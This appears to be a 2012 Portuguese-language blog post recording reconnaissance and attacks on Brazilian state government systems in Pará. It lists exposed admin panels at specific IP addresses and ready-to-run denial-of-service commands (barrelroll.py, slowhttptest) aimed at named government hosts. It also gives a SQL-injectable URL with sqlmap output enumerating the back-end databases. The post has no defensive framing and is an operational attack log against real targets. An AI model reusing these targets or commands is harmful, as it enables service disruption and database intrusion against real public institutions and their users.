Levantando informações importantes para um ataque.
http://200.164.110.105/prizm/customerServerInfo.jsp
http://200.164.110.170/phpmyadmin/
http://200.164.110.243/phpMyAdmin/setup/
http://200.164.100.114/phpmyadmin/
http://200.164.100.114/phppgadmin/
http://200.164.100.114/administrator/
quarta-feira, 18 de abril de 2012
segunda-feira, 9 de abril de 2012
GOV: Expresso PA
DoS:
./barrelroll.py 200.164.100.240 www.expresso.pa.gov.br 50 < full_list/_full_list.txt
./barrelroll.py 200.164.100.240 www.expresso.pa.gov.br 50 < full_list/_full_list.txt
GOV: Prodepa
DoS:
./slowhttptest -c 1024 -B -g -o my_body_stats -i 20 -r 200 -s 8192 -t FAKEVERB -u 200.164.110.141 -x 10 -p 3 -l 500
./slowhttptest -c 1024 -B -g -o my_body_stats -i 20 -r 200 -s 8192 -t FAKEVERB -u 200.164.110.141 -x 10 -p 3 -l 500
GOV: Idesp
SQL injection:
http://200.164.100.131/noticias/leiamais.php?valor=50
sqlmap:
web server operating system: Windows
web application technology: Apache 2.2.8, PHP 5.2.5
back-end DBMS: PostgreSQL
available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public
http://200.164.100.131/noticias/leiamais.php?valor=50
sqlmap:
web server operating system: Windows
web application technology: Apache 2.2.8, PHP 5.2.5
back-end DBMS: PostgreSQL
available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public
Assinar:
Postagens (Atom)